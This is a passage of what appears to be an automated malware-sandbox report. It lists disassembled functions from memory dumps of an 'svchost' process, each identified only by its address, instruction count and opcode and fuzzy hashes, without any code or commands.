                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21e1d25f86f779045b8d803d53b07986736f13455de73bcd6f072e1acc783ae7
                                                                                            • Instruction ID: 896a688b4d4fc4b7aaea480316ed39b984846e7f30699c2edf87be417e88634c
                                                                                            • Opcode Fuzzy Hash: 21e1d25f86f779045b8d803d53b07986736f13455de73bcd6f072e1acc783ae7
                                                                                            • Instruction Fuzzy Hash: 8B91A375E00215AFDB15CFA8D884BFEBBBDAF48700F15416AE551EB362D738D9008BA0
                                                                                            Function 03A4E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 279c1fd1339c647258f6b1d8e9451357b650e49d7056da80c0414fc29f0f6280
                                                                                            • Instruction ID: 618646c34ca37f1488ba31797c5deba8965c66d098195213fdd505bb64000b22
                                                                                            • Opcode Fuzzy Hash: 279c1fd1339c647258f6b1d8e9451357b650e49d7056da80c0414fc29f0f6280
                                                                                            • Instruction Fuzzy Hash: 24910135A006219BEB24DB28D940F7AB7F5FBD4714F0985AFE805AB390E7349901C791
                                                                                            Function 03A31131 Relevance: .3, Instructions: 259COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 79c1010253bd28f46d3ea2afa9c0fdf50b2f088f3b29b7cb68f58c5cb63ae22b
                                                                                            • Instruction ID: 1293f88f4a53be13bdc3713b1f9bafad66cff684cf4c73a15f96e030c1fb2246
                                                                                            • Opcode Fuzzy Hash: 79c1010253bd28f46d3ea2afa9c0fdf50b2f088f3b29b7cb68f58c5cb63ae22b
                                                                                            • Instruction Fuzzy Hash: ECB10175A093418FD364DF28C580A5AFBF1BB89304F184A6EF899CB352D371E945CB82
                                                                                            Function 03A64750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                            • Instruction ID: fa3e5c381cb91660f8c375df9b4690646a393b1c2c4e0ae09f5ec8799434fd40
                                                                                            • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                            • Instruction Fuzzy Hash: 86812736A047968FEF25CEAEC8C026DBB65EF57200B2C467FD4429B281C3659886C791
                                                                                            Function 03A7DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                            • Instruction ID: f0340984e7fa6eaa61b4ace1006af130b2e4f9e81631243819cd7fa537f6a2bb
                                                                                            • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                            • Instruction Fuzzy Hash: 37914E72621A06CFD725CF29CCC9662BBE0FF55324B188A1ED4E6DB6A1C375E511CB00
                                                                                            Function 03AFF7B0 Relevance: .2, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6a41012268aa69f27374539dd91b455dd862c927d0d83430ede1bae10483d270
                                                                                            • Instruction ID: 01503f04b2fd0598800241cb59883ffaea61dba819562c6fb28333244e799dae
                                                                                            • Opcode Fuzzy Hash: 6a41012268aa69f27374539dd91b455dd862c927d0d83430ede1bae10483d270
                                                                                            • Instruction Fuzzy Hash: 0C91E672A00206AFDB24CFA8C98076AB7F5EF44314F08857AFA55DB395D774E911CB90
                                                                                            Function 03AFF43F Relevance: .2, Instructions: 241COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05f00d3af0abcc9b514fe9d5be3a9b0dc7945333ddb375f697aeac1645c6a143
                                                                                            • Instruction ID: f022357de8740576d0d3fb15a3755c349ab238af2a7a8b681eb5373cd651762d
                                                                                            • Opcode Fuzzy Hash: 05f00d3af0abcc9b514fe9d5be3a9b0dc7945333ddb375f697aeac1645c6a143
                                                                                            • Instruction Fuzzy Hash: 2191F172A001158FDB18CF69C8906BEBBF1FF88315F1982BAE955DB399D634DA01CB50
                                                                                            Function 03AF81CC Relevance: .2, Instructions: 232COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22a5b7cfcbe284a673675175eed5684f2da04755d8ce6e8ed55a3ceeeb404889
                                                                                            • Instruction ID: 8c4456eeeb38421ec070c27743a91b4b01f2337a238bf0b6a1be87cd92bb8f03
                                                                                            • Opcode Fuzzy Hash: 22a5b7cfcbe284a673675175eed5684f2da04755d8ce6e8ed55a3ceeeb404889
                                                                                            • Instruction Fuzzy Hash: 4181A472E006159FCB18CFA9C8805AEB7F9FF88315B18436BE525E7290D778E951CB90
                                                                                            Function 03A40E59 Relevance: .2, Instructions: 231COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21b423466910033e4e2f516e980fe45ac0b6c6e77cb5b6cfb2ba329f9a40ad6a
                                                                                            • Instruction ID: 34cacd0ab3d2399cb40dca3a90d50c8322ceddda70ef9754b515e61b4b52089d
                                                                                            • Opcode Fuzzy Hash: 21b423466910033e4e2f516e980fe45ac0b6c6e77cb5b6cfb2ba329f9a40ad6a
                                                                                            • Instruction Fuzzy Hash: AE819631A00659DFDB14CF69C88096EFBB6FFC5210B2882ABE9559B345D730E941DB90
                                                                                            Function 03AEE4F6 Relevance: .2, Instructions: 224COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0a5b0cef1627c89b9cdd7086923615a7a57a4a7081e78a43f0e627e0cd72dbe6
                                                                                            • Instruction ID: e2752ec3d02c3c374399e8ac3dbb7bd27bb707cc919de3001d1f3c723d3adaec
                                                                                            • Opcode Fuzzy Hash: 0a5b0cef1627c89b9cdd7086923615a7a57a4a7081e78a43f0e627e0cd72dbe6
                                                                                            • Instruction Fuzzy Hash: B6815F76E002159BCB18CF99C590AADFBF1EB89310F19816ED816EF385D7349941CB90
                                                                                            Function 03AFAB40 Relevance: .2, Instructions: 222COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction ID: 5ea1e20f53b3448608d50d14848add573aa96921d58125c258e6c5a4f93292f5
                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction Fuzzy Hash: 36816F35A102099FCF18DFD9C994AAEB7B6AF84314F18856EE91A9B344D734E902CF50
                                                                                            Function 03A5D090 Relevance: .2, Instructions: 217COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                            • Instruction ID: d885c935b8e6630431087fa919aca82514e7fc5cc57b12eca0deb9c08de44dec
                                                                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                            • Instruction Fuzzy Hash: 6D817A76E001199FEF14CF69C980BADF7F2FB84344F19826BE816BB345D6359A408B91
                                                                                            Function 03A6E284 Relevance: .2, Instructions: 212COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61d4261e253ee1fb2b444870cd944de2256761f3e9c5e0faa648eab0ad2084c3
                                                                                            • Instruction ID: ddfebbdbf9858d3ab1d2b175b8f0fae66f2d0ce98a8ca4ded2997f7db5374629
                                                                                            • Opcode Fuzzy Hash: 61d4261e253ee1fb2b444870cd944de2256761f3e9c5e0faa648eab0ad2084c3
                                                                                            • Instruction Fuzzy Hash: 89813C75A00709AFDB25CFA9C980EEEF7BAFB88354F14442EE556A7250D730AC45CB60
                                                                                            Function 03A5B950 Relevance: .2, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 253aed21cfb25b98fd4b485c21fdbdda36271c2d75cf34028c370050bcf890a1
                                                                                            • Instruction ID: 1a6c0cd97bf875577684958cdb2f0fc6787621413db842671f02118da320613c
                                                                                            • Opcode Fuzzy Hash: 253aed21cfb25b98fd4b485c21fdbdda36271c2d75cf34028c370050bcf890a1
                                                                                            • Instruction Fuzzy Hash: 0971D5342046509FEB24CF2AC940B36B7E1AB85705F18855FFE969B2D5D739E802CB70
                                                                                            Function 03AEDAC6 Relevance: .2, Instructions: 202COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21486e982505c48751967af532ac42dc8b8464fac475febd8e22f9800f4f3bd6
                                                                                            • Instruction ID: 00713a7a9e90befc3e48a6ba8b99cd13caac4f5f7174c572e564f143eeed2c6a
                                                                                            • Opcode Fuzzy Hash: 21486e982505c48751967af532ac42dc8b8464fac475febd8e22f9800f4f3bd6
                                                                                            • Instruction Fuzzy Hash: 0D817C70D006A5DFDB24CFAAC488AAAFBF5EF89740F04849EE495AB285D374D841DF50
                                                                                            Function 03AF70E9 Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fc4620d45d4aab1a96d91dcd28f72a5190d40a7787516c058f3c8b586638a49
                                                                                            • Instruction ID: db727283c703c22efb48fa53f5f51d37d3ad98b7efec073b9110a4a50cd4ab5e
                                                                                            • Opcode Fuzzy Hash: 5fc4620d45d4aab1a96d91dcd28f72a5190d40a7787516c058f3c8b586638a49
                                                                                            • Instruction Fuzzy Hash: D661AF75E0031AAFCB14EFE5C980ABFB779AF44350F14452BFA11AB340EB75D9458A90
                                                                                            Function 03A4260B Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 31f8824dccb678eec6b4db7887e74bd6b9eaf3b759e8691488dbc2c4a465437f
                                                                                            • Instruction ID: 9aad400b5309c16242ab39085b48ca08ee594cd2401684898c7cbbd90e3076e4
                                                                                            • Opcode Fuzzy Hash: 31f8824dccb678eec6b4db7887e74bd6b9eaf3b759e8691488dbc2c4a465437f
                                                                                            • Instruction Fuzzy Hash: 5A719A356046419FD715DF28C580B2AF7E5FFC9210F0989ABF8988B362DB78D846CB91
                                                                                            Function 03AEF0CC Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c00640a0106b65aae920ec11854c253dc96c92a6a5c5fefcd5b74a00b6cac1a4
                                                                                            • Instruction ID: ede831d5afe994e44e74676cf927a738d0ff1e263c7c2436a0bb2558d7f04a30
                                                                                            • Opcode Fuzzy Hash: c00640a0106b65aae920ec11854c253dc96c92a6a5c5fefcd5b74a00b6cac1a4
                                                                                            • Instruction Fuzzy Hash: 28719C79A01626DFCB28CF5AC48017AF3F1FF84705B6A496FD98297640D374E980CB90
                                                                                            Function 03AB035C Relevance: .2, Instructions: 198COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction ID: 410027a447294b0fe076a5467849a7f6c2d4b3fe59bc60b5e2ff0c919b694c4a
                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                            • Instruction Fuzzy Hash: 6F716275E00619AFCB10DFA5CA44EDEBBB8FF84700F14456AE505AB351DB34EA05CB50
                                                                                            Function 03AC62A0 Relevance: .2, Instructions: 198COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                                                                            • Instruction ID: 22ea239124a80a6c05ae2f3629092a5b100deeb4a02c2c3ceea74d3df88ce04a
                                                                                            • Opcode Fuzzy Hash: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                                                                            • Instruction Fuzzy Hash: DC71F036250B41AFDB31DF14CA84FAAB7B5EF84720F18492EE2569B2B0D774E944CB50
                                                                                            Function 03AF7A46 Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                                                                            • Instruction ID: eda54f14327f02ee44bd8bfb20e6eed1e3434448bc382ea5fe8b1e3a8b82b10c
                                                                                            • Opcode Fuzzy Hash: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                                                                            • Instruction Fuzzy Hash: 37513B75A002255FCB14DFA9C980ABAF7F6EF88350B18416EFE55DB384DA35C902C7A0
                                                                                            Function 03AF132D Relevance: .2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                                                                            • Instruction ID: 89148de5321adbf616ebf5eb64088e53e4f8ec86c4a2f389848cef960d1f55bb
                                                                                            • Opcode Fuzzy Hash: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                                                                            • Instruction Fuzzy Hash: FC816D75A00205DFCB09CF99C590AAEB7F1FF88304F1981AAE859EB345D734EA41CB90
                                                                                            Function 03AF903E Relevance: .2, Instructions: 186COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                                                                            • Instruction ID: 81f3248298b1a5ed30268890f52c4dd8d2a4cfb4b5b92e4622d7b4aea49a1421
                                                                                            • Opcode Fuzzy Hash: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                                                                            • Instruction Fuzzy Hash: 3661DE75600715AFD765DFA5C984BABFBA8FF88710F04462EFA598B240DB30E510CBA1
                                                                                            Function 03AFFCF2 Relevance: .2, Instructions: 181COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1200870572b50c7b8a3589c3cd410c2042a2d007d6f77e5bd910ca4a60a41bad
                                                                                            • Instruction ID: 5ea9d18345f16e2ddd22d1805dc22fab155decfaf1b9ec67db3131377d7a6022
                                                                                            • Opcode Fuzzy Hash: 1200870572b50c7b8a3589c3cd410c2042a2d007d6f77e5bd910ca4a60a41bad
                                                                                            • Instruction Fuzzy Hash: 4261B331A0020A9FCB14DFA8C980ABEF7F5FF48318F14466AF655EB284D734A955CB50
                                                                                            Function 03A37703 Relevance: .2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3de7bfd220899a245adaf27acc33cb3ed554d7c128db9940cd4549b1d5f1279
                                                                                            • Instruction ID: 71c0c36b114e8567936c3ee2240cb89420d5a52c6967ea6fe967638005a442a9
                                                                                            • Opcode Fuzzy Hash: a3de7bfd220899a245adaf27acc33cb3ed554d7c128db9940cd4549b1d5f1279
                                                                                            • Instruction Fuzzy Hash: B56123B5A00605EFDB18DF68C580AADFBB5FF89304F18856FE519A7340DB35A941CB90
                                                                                            Function 03AF92A6 Relevance: .2, Instructions: 174COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                                                                            • Instruction ID: fdeef5b6294c43eaf4f615a99ca215fb3b358faf2350f8c4bcf4b3c5add0ea5d
                                                                                            • Opcode Fuzzy Hash: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                                                                            • Instruction Fuzzy Hash: 1161DF352047428FD315DFA8C994B6BB7E4BF90708F18496EFA858B391DB35E806CB91
                                                                                            Function 03AFCE93 Relevance: .2, Instructions: 172COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                            • Instruction ID: e166fbb1b322efa79da8d6305b759d37e86ded2fedeea4b75bfbf3b058a5a72f
                                                                                            • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                            • Instruction Fuzzy Hash: 8251143260430A5FC715DF6AC85076AFBE6AFC1260F19846FFA56CB349DA30D9098791
                                                                                            Function 0040FF53 Relevance: .2, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                            • Instruction ID: 2948c7844e8bf5681bf2219b824e50f63151c4f0def850ce58ccbf78af4cf3ed
                                                                                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                            • Instruction Fuzzy Hash: F05173B3E14A214BD3188E09CC40672B792FFD8312B5F81BEDD199B357CE74E9529A90
                                                                                            Function 03A2B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                                            • Instruction ID: b7cffca9b55cadc5ce182b24b595e6e4db7158a9e29d6fd6bafd6231a4bad012
                                                                                            • Opcode Fuzzy Hash: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                                            • Instruction Fuzzy Hash: DD412535600710AFCB25EF29DA80F2ABBA9EF44764F15456FE5599B790D770DC008BA0
                                                                                            Function 03AF7D73 Relevance: .2, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                                            • Instruction ID: 38db14aedf57af1314f5e5ca0520f7c6de744aa5ee7f235083505909804e4d3f
                                                                                            • Opcode Fuzzy Hash: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                                            • Instruction Fuzzy Hash: 0951C136A1014A8FCB08CFA8C480AEEB7F1EF98314B19827ED915DB355E731DA15CB90
                                                                                            Function 03A43740 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                                                                            • Instruction ID: 14baf193abc821607c6d58d3f3da0c0bfcc6ca8cbab737ca72ca89da183d8a0b
                                                                                            • Opcode Fuzzy Hash: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
